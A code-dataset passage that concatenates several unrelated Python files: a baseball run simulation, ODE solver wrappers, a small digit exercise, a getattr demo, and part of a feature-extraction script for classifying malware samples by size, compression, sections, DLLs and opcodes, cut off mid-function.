# print("{} Len Old States {}, Len of Final States {}".format(num_iter, num_old_states,len(final_states)))
# current_player = players[current_player_idx%len(players)]
# for cur_state_idx in range(0,num_old_states):
# cur_state = states[cur_state_idx]
# if(current_player.p1b > 0.0):
# new_state = cur_state.next_state(BaseBallAction.Single, current_player.p1b)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# if(current_player.p2b > 0.0):
# new_state = cur_state.next_state(BaseBallAction.Double, current_player.p2b)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# if(current_player.p3b > 0.0):
# new_state = cur_state.next_state(BaseBallAction.Triple, current_player.p3b)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# if(current_player.phr > 0.0):
# new_state = cur_state.next_state(BaseBallAction.HomeRun, current_player.phr)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# if(current_player.pso > 0.0):
# new_state = cur_state.next_state(BaseBallAction.StrikeOut, current_player.pso)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# if(current_player.pbo > 0.0):
# new_state = cur_state.next_state(BaseBallAction.ThrownOut, current_player.pbo)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# del states[0:num_old_states]
# if(len(states) == 0):
# break
# current_player_idx = current_player_idx + 1
#f= open("final_states.csv","w+")
#final_states = 0
def test():
runs = [0.0 for i in range(0,21)]
def run_next_iter(cur_state, player_idx, baseball_action, probability):
new_state = cur_state.next_state(baseball_action, probability)
if(new_state.inning > MAX_INNINGS):
runs[new_state.runs] = runs[new_state.runs] + new_state.likelihood
else:
run_next_player(new_state,(player_idx + 1)%len(players))
def run_next_player(cur_state, player_idx, do_print = False):
current_player = players[player_idx%len(players)]
if(current_player.p1b > 0.0):
if(do_print):
print('First Base Hit')
run_next_iter(cur_state,player_idx,BaseBallAction.Single, current_player.p1b)
if(current_player.p2b > 0.0):
if(do_print):
print('Second Base Hit')
run_next_iter(cur_state,player_idx,BaseBallAction.Double, current_player.p2b)
if(current_player.p3b > 0.0):
if(do_print):
print('Third Base Hit')
run_next_iter(cur_state,player_idx,BaseBallAction.Triple, current_player.p3b)
if(current_player.phr > 0.0):
if(do_print):
print('Home Run Hit')
run_next_iter(cur_state,player_idx,BaseBallAction.HomeRun, current_player.phr)
if(current_player.pso > 0.0):
if(do_print):
print('Strike Out')
run_next_iter(cur_state,player_idx,BaseBallAction.StrikeOut, current_player.pso)
if(current_player.pbo > 0.0):
if(do_print):
print('Thrown Out')
run_next_iter(cur_state,player_idx,BaseBallAction.ThrownOut, current_player.pbo)
start_state = BaseballState(1,0,0,0,0,0)
state_player_idx = 0
run_next_player(start_state, state_player_idx, True)
print(runs)
w_sum = 0
for idx, val in enumerate(runs):
w_sum = w_sum + val*idx
print(w_sum)
| true |
03a63783eb51e04ad19fa1d4ed6ef4537a836694 | Python | upb-lea/gym-electric-motor | /gym_electric_motor/physical_systems/solvers.py | UTF-8 | 7,407 | 3.390625 | 3 | [
"MIT"
] | permissive | from scipy.integrate import ode, solve_ivp, odeint
class OdeSolver:
"""
Interface and base class for all used OdeSolvers in gym-electric-motor.
"""
#: Current system time t
_t = 0
#: Current system state y
_y = None
#: Function parameters that are passed to the system equation and the system jacobian additionally to t and y
_f_params = None
#: System equation in the form: _system_equation(t, y, *f_params)
_system_equation = None
#: System jacobian in the form _system_jacobian(t,y, *f_params)
_system_jacobian = None
@property
def t(self):
"""
Returns:
float: Current system time t
"""
return self._t
@property
def y(self):
"""
Returns:
float: Current system state y
"""
return self._y
def set_initial_value(self, initial_value, t=0):
"""
Set the new initial system state after reset.
Args:
initial_value(numpy.ndarray(float)): Initial system state
t(float): Initial system time
"""
self._y = initial_value
self._t = t
def integrate(self, t):
"""
Integrate the ODE-System from current time until time t
Args:
t(float): Time until the system shall be integrated
Returns:
ndarray(float): New system state at time t
"""
raise NotImplementedError
def set_system_equation(self, system_equation, jac=None):
"""
Setting of the systems equation.
Args:
system_equation(function_pointer): Pointer to the systems equation with the parameters (t, y, *args)
jac(function_pointer): Pointer to the systems jacobian with the parameters (t, y, *args)
"""
self._system_equation = system_equation
self._system_jacobian = jac
def set_f_params(self, *args):
"""
Set further arguments for the systems function call like input quantities.
Args:
args(list): Additional arguments for the next function calls.
"""
self._f_params = args
class EulerSolver(OdeSolver):
"""
Solves a system of differential equations of first order for a given time step with linear approximation.
.. math:
x^\prime(t) = f(x(t))
.. math:
x(t + \\frac{\\tau}{nsteps}) = x(t) + x^\prime(t) * \\frac{\\tau}{nsteps}
"""
def __init__(self, nsteps=1):
"""
Args:
nsteps(int): Number of cycles to calculate for each iteration. Higher steps make the system more accurate,
but take also longer to compute.
"""
self._nsteps = nsteps
self._integrate = self._integrate_one_step if nsteps == 1 else self._integrate_nsteps
def integrate(self, t):
# Docstring of superclass
return self._integrate(t)
def _integrate_nsteps(self, t):
"""
Integration method for nsteps > 1
Args:
t(float): Time until the system shall be calculated
Returns:
ndarray(float):The new state of the system.
"""
tau = (t - self._t) / self._nsteps
state = self._y
current_t = t
for _ in range(self._nsteps):
delta = self._system_equation(current_t + tau, state, *self._f_params) * tau
state = state + delta
current_t += tau
self._y = state
self._t = t
return self._y
def _integrate_one_step(self, t):
"""
Integration method for nsteps = 1. (For faster computation)
Args:
t(float): Time until the system shall be calculated
Returns:
ndarray(float):The new state of the system.
"""
self._y = self._y + self._system_equation(self._t, self._y, *self._f_params) * (t - self._t)
self._t = t
return self._y
class ScipyOdeSolver(OdeSolver):
"""
Wrapper class for all ode-solvers in the scipy.integrate.ode package.
https://docs.scipy.org/doc/scipy/reference/generated/scipy.integrate.ode.html
"""
#: Integrator object
_ode = None
@property
def t(self):
return self._ode.t
@property
def y(self):
return self._ode.y
def __init__(self, integrator='dopri5', **kwargs):
"""
Args:
integrator(str): String to choose the integrator from the scipy.integrate.ode
kwargs(dict): All parameters that can be set in the "set_integrator"-method of scipy.integrate.ode
"""
self._solver = None
self._solver_args = kwargs
self._integrator = integrator
def set_system_equation(self, system_equation, jac=None):
# Docstring of superclass
super().set_system_equation(system_equation, jac)
self._ode = ode(system_equation, jac).set_integrator(self._integrator, **self._solver_args)
def set_initial_value(self, initial_value, t=0):
# Docstring of superclass
self._ode.set_initial_value(initial_value, t)
def set_f_params(self, *args):
# Docstring of superclass
super().set_f_params(*args)
self._ode.set_f_params(*args)
self._ode.set_jac_params(*args)
def integrate(self, t):
# Docstring of superclass
return self._ode.integrate(t)
class ScipySolveIvpSolver(OdeSolver):
"""
Wrapper class for all ode-solvers in the scipy.integrate.solve_ivp function
https://docs.scipy.org/doc/scipy/reference/generated/scipy.integrate.solve_ivp.html
"""
def __init__(self, **kwargs):
# Docstring of superclass
self._solver_kwargs = kwargs
def set_system_equation(self, system_equation, jac=None):
# Docstring of superclass
method = self._solver_kwargs.get('method', None)
super().set_system_equation(system_equation, jac)
# Only Radau BDF and LSODA support the jacobian.
if method in ['Radau', 'BDF', 'LSODA']:
self._solver_kwargs['jac'] = self._system_jacobian
def integrate(self, t):
# Docstring of superclass
result = solve_ivp(
self._system_equation, [self._t, t], self._y, t_eval=[t], args=self._f_params, **self._solver_kwargs
)
self._t = t
self._y = result.y.T[-1]
return self._y
class ScipyOdeIntSolver(OdeSolver):
"""
Wrapper class for all ode-solvers in the scipy.integrate.odeint function.
https://docs.scipy.org/doc/scipy/reference/generated/scipy.integrate.odeint.html
"""
def __init__(self, **kwargs):
"""
Args:
kwargs(dict): Arguments to pass to the solver. See the scipy description for further information.
"""
self._solver_args = kwargs
def integrate(self, t):
# Docstring of superclass
result = odeint(self._system_equation, self._y, [self._t, t], args=self._f_params, Dfun=self._system_jacobian,
tfirst=True, **self._solver_args)
self._t = t
self._y = result[-1]
return self._y
| true |
0789827c056b4b093c80a5bb2afd1b79b4fbf777 | Python | mayankt90/Python100QuesChallenge | /Day3.3.py | UTF-8 | 1,018 | 4.34375 | 4 | [] | no_license | # Write a program, which will find all such numbers between 1000 and 3000 (both included) such that each digit of the number is an even number.The numbers obtained should be printed in a comma-separated sequence on a single line.
l = []
for i in range(1000, 3001):
if i % 2 == 0:
i = str(i)
l.append(i)
# l = str(l)
print(",".join(l))
print()
# Every digit Problem:
ls = []
for i in range(1000,3001):
i = str(i)
if (int(i[0])%2 == 0) and (int(i[1])%2 == 0) and (int(i[2])%2 == 0) and (int(i[3])%2 == 0):
ls.append(i)
print(','.join(ls))
# or
lst = []
for i in range(1000,3001):
flag = 1
for j in str(i): # every integer number i is converted into string
if ord(j)%2 != 0: # ord returns ASCII value and j is every digit of i also str can be changed inti int.
flag = 0 # flag becomes zero if any odd digit found
if flag == 1:
lst.append(str(i)) # i is stored in list as string
print(",".join(lst))
| true |
b517dfd48b1dfd96ee5d3e05719f28c9dd64fe0d | Python | zeronezer/pydemo | /购物车/aa.py | UTF-8 | 165 | 2.671875 | 3 | [] | no_license | class a:
"""docstring for a"""
def __init__(self, arg):
self.arg = arg
def b(self,name):
print (self.arg,name)
qq=input('>>:').strip()
getattr(a(1),qq)(2) | true |
50cefff394ef5355637a1e9cb5f1d538b4e2d8d8 | Python | mcvenkat/Python-Programs | /_fast_feature_extraction.py | UTF-8 | 27,279 | 2.65625 | 3 | [
"MIT",
"CC0-1.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ######################################################
# _fast_feature_extraction.py
# author: Gert Jacobusse, gert.jacobusse@rogatio.nl
# licence: FreeBSD
"""
Copyright (c) 2015, Gert Jacobusse
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE POSSIBILITY OF SUCH DAMAGE.
"""
# required directory structure:
# > feature_extraction.py
# > trainLabels.csv
# > sampleSubmission.csv
# train> (all train files)
# test> (all test files)
######################################################
# import dependencies
import os
import csv
import zipfile
from io import BytesIO
from collections import defaultdict
import re
import numpy as np
######################################################
# list ids and labels
trainids=[]
labels=[]
with open('trainLabels.csv','r') as f:
r=csv.reader(f)
r.next() # skip header
for row in r:
trainids.append(row[0])
labels.append(float(row[1]))
testids=[]
with open('sampleSubmission.csv','r') as f:
r=csv.reader(f)
r.next()
for row in r:
testids.append(row[0])
######################################################
# general functions
def readdata(fname,header=True,selectedcols=None):
with open(fname,'r') as f:
r=csv.reader(f)
names = r.next() if header else None
if selectedcols:
assert header==True
data = [[float(e) for i,e in enumerate(row) if names[i] in selectedcols] for row in r]
names = [name for name in names if name in selectedcols]
else:
data = [[float(e) for e in row] for row in r]
return data,names
def writedata(data,fname,header=None):
with open(fname,'w') as f:
w=csv.writer(f)
if header:
w.writerow(header)
for row in data:
w.writerow(row)
######################################################
# extract file properties
"""
function getcompressedsize
input: path to file
output: compressed size of file
* read file and compress it in memory
"""
def getcompressedsize(fpath):
inMemoryOutputFile = BytesIO()
zf = zipfile.ZipFile(inMemoryOutputFile, 'w')
zf.write(fpath, compress_type=zipfile.ZIP_DEFLATED)
s = float(zf.infolist()[0].compress_size)
zf.close()
return s
"""
function writefileprops
input: ids of trainset or testset, string "train" or "test"
output: writes train_fileprops or test_fileprops
* extract file properties (size, compressed size, ratios) from all files in train or test set
"""
def writefileprops(ids,trainortest):
with open('%s_fileprops.csv'%trainortest,'w') as f:
w=csv.writer(f)
w.writerow(['asmSize','bytesSize',
'asmCompressionRate','bytesCompressionRate',
'ab_ratio','abc_ratio','ab2abc_ratio'])
for i in ids:
asmsiz=float(os.path.getsize('%s/'%trainortest+i+'.asm'))
bytsiz=float(os.path.getsize('%s/'%trainortest+i+'.bytes'))
asmcr=getcompressedsize('%s/'%trainortest+i+'.asm')/asmsiz
bytcr=getcompressedsize('%s/'%trainortest+i+'.bytes')/bytsiz
ab=asmsiz/bytsiz
abc=asmcr/bytcr
w.writerow([asmsiz,bytsiz,asmcr,bytcr,ab,abc,ab/abc])
f.flush()
######################################################
# extract asm contents
"""
the following three selections (on sections, dlls and opcodes) can be verified by looking
at the metadata files that are written during feature extraction. They are added here to
illustrate what the features mean, and to make the code more readible
"""
# sections that occur in at least 5 files from the trainset:
selsections=['.2', '.3', '.CRT', '.Lax503', '.Much', '.Pav', '.RDATA', '.Racy',
'.Re82', '.Reel', '.Sty', '.Tls', '.adata', '.bas', '.bas0', '.brick',
'.bss', '.code', '.cud', '.data', '.data1', '.edata', '.gnu_deb', '.hdata',
'.icode', '.idata', '.laor', '.ndata', '.orpc', '.pdata', '.rata', '.rdat',
'.rdata', '.reloc', '.rsrc', '.sdbid', '.sforce3', '.text', '.text1', '.tls',
'.xdata', '.zenc', 'BSS', 'CODE', 'DATA', 'GAP', 'HEADER', 'Hc%37c',
'JFsX_', 'UPX0', 'UPX1', 'Xd_?_mf', '_0', '_1', '_2', '_3',
'_4', '_5', 'bss', 'code', 'seg000', 'seg001', 'seg002', 'seg003',
'seg004']
# dlls that occur in at least 30 files from the trainset:
seldlls=['', '*', '2', '32', 'advapi32', 'advpack', 'api', 'apphelp',
'avicap32', 'clbcatq', 'comctl32', 'comdlg32', 'crypt32', 'dbghelp', 'dpnet', 'dsound',
'e', 'gdi32', 'gdiplus', 'imm32', 'iphlpapi', 'kernel32', 'libgcj_s', 'libvlccore',
'mapi32', 'mfc42', 'mlang', 'mpr', 'msasn1', 'mscms', 'mscoree', 'msdart',
'msi', 'msimg32', 'msvcp60', 'msvcp71', 'msvcp80', 'msvcr71', 'msvcr80', 'msvcr90',
'msvcrt', 'msvfw32', 'netapi32', 'ntdll', 'ntdsapi', 'ntmarta', 'ntshrui', 'ole32',
'oleacc', 'oleaut32', 'oledlg', 'opengl32', 'psapi', 'rasapi32', 'riched20', 'riched32',
'rnel32', 'rpcrt4', 'rsaenh', 'secur32', 'security', 'sensapi', 'setupapi', 'shell32',
'shfolder', 'shlwapi', 'tapi32', 'unicows', 'urlmon', 'user32', 'usp10', 'uxtheme',
'version', 'wab32', 'wininet', 'winmm', 'wintrust', 'wldap32', 'ws2_32', 'wsock32',
'xprt5']
# opcodes that occur in at least 30 files from the trainset:
selopcs=['aad', 'aam', 'adc', 'add', 'addpd', 'addps', 'addsd', 'align',
'and', 'andnps', 'andpd', 'andps', 'arpl', 'assume', 'bound', 'bsf',
'bsr', 'bswap', 'bt', 'btc', 'btr', 'bts', 'call', 'cmova',
'cmovb', 'cmovbe', 'cmovg', 'cmovge', 'cmovl', 'cmovle', 'cmovnb', 'cmovns',
'cmovnz', 'cmovs', 'cmovz', 'cmp', 'cmpeqsd', 'cmpltpd', 'cmps', 'cmpxchg',
'db', 'dd', 'dec', 'div', 'divsd', 'dq', 'dt', 'dw',
'end', 'endp', 'enter', 'fadd', 'faddp', 'fbld', 'fbstp', 'fcmovb',
'fcmovbe', 'fcmove', 'fcmovnb', 'fcmovnbe', 'fcmovne', 'fcmovnu', 'fcmovu', 'fcom',
'fcomi', 'fcomip', 'fcomp', 'fdiv', 'fdivp', 'fdivr', 'fdivrp', 'ffree',
'ffreep', 'fiadd', 'ficom', 'ficomp', 'fidiv', 'fidivr', 'fild', 'fimul',
'fist', 'fistp', 'fisttp', 'fisub', 'fisubr', 'fld', 'fldcw', 'fldenv',
'fmul', 'fmulp', 'fnsave', 'fnstcw', 'fnstenv', 'fnstsw', 'frstor', 'fsave',
'fst', 'fstcw', 'fstp', 'fstsw', 'fsub', 'fsubp', 'fsubr', 'fsubrp',
'fucom', 'fucomi', 'fucomip', 'fucomp', 'fxch', 'hnt', 'hostshort',
'ht', 'idiv', 'imul', 'in', 'inc', 'include', 'int', 'ja', 'jb', 'jbe',
'jecxz', 'jg', 'jge', 'jl', 'jle', 'jmp', 'jnb', 'jno', 'jnp', 'jns',
'jnz', 'jo', 'jp', 'js', 'jz', 'ldmxcsr', 'lds', 'lea', 'les', 'lock',
'lods', 'loop', 'loope', 'loopne', 'mov', 'movapd', 'movaps', 'movd',
'movdqa', 'movhps', 'movlpd', 'movlps', 'movq', 'movs', 'movsd', 'movss',
'movsx', 'movups', 'movzx', 'mul', 'mulpd', 'mulps', 'mulsd', 'neg',
'nop', 'not', 'offset', 'or', 'orpd', 'orps', 'out', 'outs', 'paddb',
'paddd', 'paddq', 'paddsb', 'paddsw', 'paddusb', 'paddusw', 'paddw',
'pand', 'pandn', 'pavgb', 'pcmpeqb', 'pcmpeqd', 'pcmpeqw', 'pcmpgtb',
'pcmpgtd', 'pcmpgtw', 'pextrw', 'piconinfo', 'pinsrw', 'pmaddwd',
'pmaxsw', 'pmulhw', 'pmullw', 'pop', 'por', 'pperrinfo', 'proc',
'pshufd', 'pshufw', 'pslld', 'psllq', 'psllw', 'psrad', 'psraw',
'psrld', 'psrlq', 'psrlw', 'psubb', 'psubd', 'psubq', 'psubsb',
'psubsw', 'psubusb', 'psubusw', 'psubw', 'public', 'punpckhbw',
'punpckhdq', 'punpckhwd', 'punpcklbw', 'punpckldq', 'punpcklwd',
'push', 'pxor', 'rcl', 'rcpps', 'rcr', 'rep', 'repe', 'repne',
'retf', 'retfw', 'retn', 'retnw', 'rgsabound', 'rol', 'ror', 'sal',
'sar', 'sbb', 'scas', 'segment', 'setb', 'setbe', 'setl', 'setle',
'setnb', 'setnbe', 'setnl', 'setnle', 'setns', 'setnz', 'seto',
'sets', 'setz', 'shl', 'shld', 'shr', 'shrd', 'shufps', 'sldt',
'stmxcsr', 'stos', 'sub', 'subpd', 'subps', 'subsd', 'test',
'ucomisd', 'unicode', 'xadd', 'xchg', 'xlat', 'xor', 'xorpd', 'xorps']
"""
function getsectioncounts
input: list of lines in an asm file
output: dictionary with number of lines in each section
* count number of lines in each section
"""
def getsectioncounts(asmlines):
sectioncounts=defaultdict(int)
for l in asmlines:
sectioncounts[l.split(':')[0]]+=1
return sectioncounts
"""
function getcalls
input: list of lines in an asm file
output: dictionary with number of times each function is found
* count number of times each function occurs
"""
def getcalls(asmlines):
calls=defaultdict(int)
for l in asmlines:
ls=l.split('__stdcall ')
if len(ls)>1:
calls[ls[1].split('(')[0]]+=1
return calls
"""
function getdlls
input: list of lines in an asm file
output: dictionary with number of times each dll is found
* count number of times each dll occurs
"""
def getdlls(asmlines):
dlls=defaultdict(int)
for l in asmlines:
ls=l.lower().split('.dll')
if len(ls)>1:
dlls[ls[0].replace('\'',' ').split(' ')[-1].split('"')[-1].split('<')[-1].split('\\')[-1].split('\t')[-1]]+=1
return dlls
"""
function getopcodeseries
input: list of lines in an asm file
output: series of opcodes in the order in which they occur
* extract all opcodes using regular expressions
* first used to create opcode ngrams, but later translated to counts using series2freqs
"""
def getopcodeseries(asmlines):
ops=[]
opex=re.compile('( )([a-z]+)( )')
for l in asmlines:
e=opex.search(l)
if e:
ops.append(e.group(2))
return ops
def series2freqs(series):
freqs=defaultdict(int)
for e in series:
freqs[e]+=1
return freqs
"""
function getqperc
input: list of lines in an asm file
output: percent of characters that is a questionmark
* count number of questionmarks and divide it by number of characters
"""
def getqperc(asmlines):
n=0
nq=0
for l in asmlines:
for c in l:
n+=1
if c=='?':
nq+=1
return float(nq)/n
"""
function countbysection
input: list of lines in an asm file, list of sections to include, list of characters to include
output: number of occurences of each specified character by section, list of feature names, list of characters included
* count number of occurences of each specified character by section
"""
def countbysection(asmlines,segms,chars=[' ','?','.',',',':',';','+','-','=','[','(','_','*','!','\\','/','\''],namesonly=False):
names=['%s_tot'%ss for ss in selsections]
for c in chars:
names.extend(['%s_c%s'%(ss,c) for ss in selsections])
if namesonly:
return names+['restsegm']+['%s_restchar'%ss for ss in selsections]
ns=len(segms)
nc=len(chars)
segmdict={e:i for i,e in enumerate(segms)}
chardict={e:i for i,e in enumerate(chars)}
counts=[0 for i in xrange((nc+1)*ns)]
for l in asmlines:
segm=l.split(':')[0]
if segm in segmdict:
s=segmdict[segm]
for ch in l:
counts[s]+=1
if ch in chardict:
c=chardict[ch]
counts[ns+c*ns+s]+=1
return counts,names,chars
"""
function normalizecountbysection
input: output of function countbysection
output: normalized number of occurences of each specified character by section
* divide number of occurences of each specified character by section by total number
* and calculate rest percent of other characters and other sections
"""
def normalizecountbysection(counts,names,chars):
d={names[i]:counts[i] for i in xrange(len(names))}
tot=sum([d['%s_tot'%s] for s in selsections])
d['restsegm']=1.0
for s in selsections:
d['%s_restchar'%s]=0.0
if d['%s_tot'%s] > 0:
d['%s_restchar'%s]=1.0
for c in chars:
d['%s_c%s'%(s,c)]=float(d['%s_c%s'%(s,c)])/d['%s_tot'%s]
d['%s_restchar'%s]-=d['%s_c%s'%(s,c)]
d['%s_tot'%s]=float(d['%s_tot'%s])/tot
d['restsegm']-=d['%s_tot'%s]
return [d[name] for name in names+['restsegm']+['%s_restchar'%ss for ss in selsections]]
"""
function writeasmcontents
input: ids of trainset or testset, string "train" or "test"
output: writes train_asmcontents or test_asmcontents + metadata on sections, calls, dlls and opcodes
* extract features from contents of asm from all files in train or test set
* by reading list of asm lines from each file and calling the previous functions
"""
def writeasmcontents(ids,trainortest):
with open('%s_asmcontents.csv'%trainortest,'w') as f:
w=csv.writer(f)
w.writerow(
['sp_%s'%key for key in selsections]
+['dl_%s'%key for key in seldlls]
+['op_%s'%key for key in selopcs]
+['qperc']
+countbysection(None,selsections,namesonly=True)
)
fsec=open('secmetadata%s.txt'%trainortest,'w')
wsec=csv.writer(fsec)
fcal=open('calmetadata%s.txt'%trainortest,'w')
wcal=csv.writer(fcal)
fdll=open('dllmetadata%s.txt'%trainortest,'w')
wdll=csv.writer(fdll)
fopc=open('opcmetadata%s.txt'%trainortest,'w')
wopc=csv.writer(fopc)
for i in ids:
with open('%s/'%trainortest+i+'.asm','r') as fasm:
asmlines=[line for line in fasm.readlines()]
# section counts/ proportions
sc=getsectioncounts(asmlines)
wsec.writerow([i]+['%s:%s'%(key,sc[key]) for key in sc if sc[key]>0])
scsum=sum([sc[key] for key in sc])
secfeat=[float(sc[key])/scsum for key in selsections]
# calls
cal=getcalls(asmlines)
wcal.writerow([i]+['%s:%s'%(key,cal[key]) for key in cal if cal[key]>0])
# dlls
dll=getdlls(asmlines)
wdll.writerow([i]+['%s:%s'%(key,dll[key]) for key in dll if dll[key]>0])
dllfeat=[float(dll[key]) for key in seldlls]
# opcodes
opc=series2freqs(getopcodeseries(asmlines))
wopc.writerow([i]+['%s:%s'%(key,opc[key]) for key in opc if opc[key]>0])
opcfeat=[float(opc[key]) for key in selopcs]
# overall questionmark proportion
qperc=getqperc(asmlines)
# normalized interpunction characters by section
ipbysecfeat=normalizecountbysection(*countbysection(asmlines,selsections))
#
w.writerow(secfeat+dllfeat+opcfeat+[qperc]+ipbysecfeat)
f.flush()
fsec.close()
fcal.close()
fdll.close()
fopc.close()
######################################################
# reduce asm contents features, using a criterion on the number of files with nonzero value
"""
function writeasmcontents
input: traindata matrix, testdata matrix, feature names, criterion on required number of nonzeros in each column
output: reduced traindata matrix, testdata matrix and feature names
* calculate number of nonzeros by column and keep only features that meet the criterion
"""
def reducefeatures(xtrain,xtest,names,ncrit=500):
ntrain=np.sum(np.array([np.array([ei!=0 for ei in e]) for e in xtrain]),axis=0)
xtrain=np.array([np.array([e[j] for j,n in enumerate(ntrain) if n>ncrit]) for e in xtrain])
xtest=np.array([np.array([e[j] for j,n in enumerate(ntrain) if n>ncrit]) for e in xtest])
names=[names[j] for j,n in enumerate(ntrain) if n>ncrit]
return xtrain,xtest,names
"""
function reduceasmcontents
input: none
output: write reduced asm contents
* read features on asm contents, reduce them by calling reducefeatures and write the results
"""
def reduceasmcontents():
train_asmcontents,asmcontentshead=readdata('train_asmcontents.csv')
test_asmcontents,_=readdata('test_asmcontents.csv')
train_asmcontents_red,test_asmcontents_red,asmcontentshead_red=reducefeatures(
train_asmcontents,test_asmcontents,asmcontentshead)
writedata(train_asmcontents_red,'train_asmcontents_red.csv',asmcontentshead_red)
writedata(test_asmcontents_red,'test_asmcontents_red.csv',asmcontentshead_red)
######################################################
# calculate statistics on asm metadata
"""
function loadmetadata
input: path of metadatafile (written by writeasmcontents)
output: dictionary with metadata
* load metadata into dictionary
"""
def loadmetadata(inpath):
md={}
with open(inpath,'r') as f:
r=csv.reader(f)
for row in r:
md[row[0]]=defaultdict(int)
for e in row[1:]:
key,value=e.split(':')[-2:]
md[row[0]][key]=int(value)
return md
"""
function getstats
input: metadata dictionary, dictionary keys sorted by number of occurrences over train and test set, type of metadata (sec[tions], dll[s], cal[ls] or opc[odes])
output: statistics on the specified type of metadata
* calculate statistics on the specified type of metadata
"""
def getstats(dct,sortedkeys,datatype):
stats={}
for i in dct:
stats[i]={}
d=dct[i]
n=len(d)
sm=sum([d[key] for key in d]) if n>0 else 0
pmx=100*max([d[key] for key in d])/sm if n>0 else 0
stats[i]['%s_nkey'%datatype]=n
stats[i]['%s_sum'%datatype]=sm
stats[i]['%s_pmax'%datatype]=pmx
top5={key for key in sortedkeys[:5]}
top20={key for key in sortedkeys[:20]}
top50={key for key in sortedkeys[:50]}
stats[i]['%s_n5key'%datatype]=len([e for e in d if e in top5])
stats[i]['%s_n20key'%datatype]=len([e for e in d if e in top20])
stats[i]['%s_n50key'%datatype]=len([e for e in d if e in top50])
return stats
"""
function getstatsfromdata
input: type of metadata (sec[tions], dll[s], cal[ls] or opc[odes])
output: statistics on the specified type of metadata for both trainset and testset
* for each value, count the number of occurrences over train and test set
* call getstats to calculate statistics for each file
"""
def getstatsfromdata(datatype):
traindict=loadmetadata('%smetadatatrain.txt'%datatype)
testdict=loadmetadata('%smetadatatest.txt'%datatype)
allkeys=defaultdict(int)
for i in traindict:
for key in traindict[i]:
allkeys[key]+=1
for i in testdict:
for key in testdict[i]:
allkeys[key]+=1
sortedkeys=sorted([key for key in allkeys],reverse=True,key=lambda x: allkeys[x])
trainstats=getstats(traindict,sortedkeys,datatype)
teststats=getstats(testdict,sortedkeys,datatype)
return trainstats,teststats
"""
function writeasmstats
input: feature types (use only default; why is this a parameter??? I don't remember)
output: writes asm statistics to files for both train and test set
* call getstatsfromdata to calculate statistics on sec[tions], dll[s], cal[ls] and opc[odes]
* write the results to train_asmstats and test_asmstats
"""
def writeasmstats(stats=['nkey', 'sum', 'pmax', 'n5key', 'n20key', 'n50key']):
traindata=[[] for i in xrange(len(trainids))]
testdata=[[] for i in xrange(len(testids))]
names=[]
for datatype in ['sec','dll','cal','opc']:
keys=['%s_%s'%(datatype,stat) for stat in stats]
trainstats,teststats=getstatsfromdata(datatype)
for inum,i in enumerate(trainids):
traindata[inum].extend([trainstats[i][key] for key in keys])
for inum,i in enumerate(testids):
testdata[inum].extend([teststats[i][key] for key in keys])
names.extend(keys)
writedata(traindata,'train_asmstats.csv',names)
writedata(testdata,'test_asmstats.csv',names)
######################################################
# extract bytes contents
"""
function getcompressedsize_str
input: string
output: compressed size of string
* compress string and return the compressed size
"""
def getcompressedsize_str(strinput):
inMemoryOutputFile = BytesIO()
zf = zipfile.ZipFile(inMemoryOutputFile, 'w')
zf.writestr('',strinput, compress_type=zipfile.ZIP_DEFLATED)
return zf.infolist()[0].compress_size
"""
function writeblocksizes
input: ids of trainset or testset, string "train" or "test"
output: writes train_blocksizes or test_blocksizes
* calculate and write compressed size of each 4 kB block for all files in train or test set
"""
def writeblocksizes(ids,trainortest,blocksize=256): # 256 times 16 bytes = 4096 bytes
with open('%s_blocksizes.csv'%trainortest,'w') as fout:
for i in ids:
with open('%s/%s.bytes'%(trainortest,i),'r') as fin:
contents=fin.readlines()
fout.write('%s,'%i)
n=len(contents)
blocksize=256
nblock=n/256
for b in xrange(nblock):
strinput=''
for lidx in xrange(b*blocksize,(b+1)*blocksize):
l=contents[lidx]
strinput += l[l.find(' ')+1:-1]
s=getcompressedsize_str(strinput)
fout.write('%d,'%s)
fout.write('\n')
"""
function writeblocksizedistributions
input: string "train" or "test"
output: writes train_blocksizedistributions or test_blocksizedistributions
* calculate statistics on files with blocksizes to get the same number of features for each file
"""
def writeblocksizedistributions(trainortest):
with open('%s_blocksizes.csv'%trainortest,'r') as f:
with open('%s_blocksizedistributions.csv'%trainortest,'w') as fout:
fout.write('cs4k_min,cs4k_p10,cs4k_p20,cs4k_p30,cs4k_p50,cs4k_p70,cs4k_p80,cs4k_p90,cs4k_max,cs4k_mean,cs4k_q1mean,cs4k_q2mean,cs4k_q3mean,cs4k_q4mean\n')
for i,l in enumerate(f):
ls=l.split(',')
sizes=[float(e) for e in ls[1:-1]]
slen=len(sizes)
qlen=1 if slen/4<1 else slen/4
q1m=np.mean(sizes[:qlen])
q2m=np.mean(sizes[qlen:2*qlen])
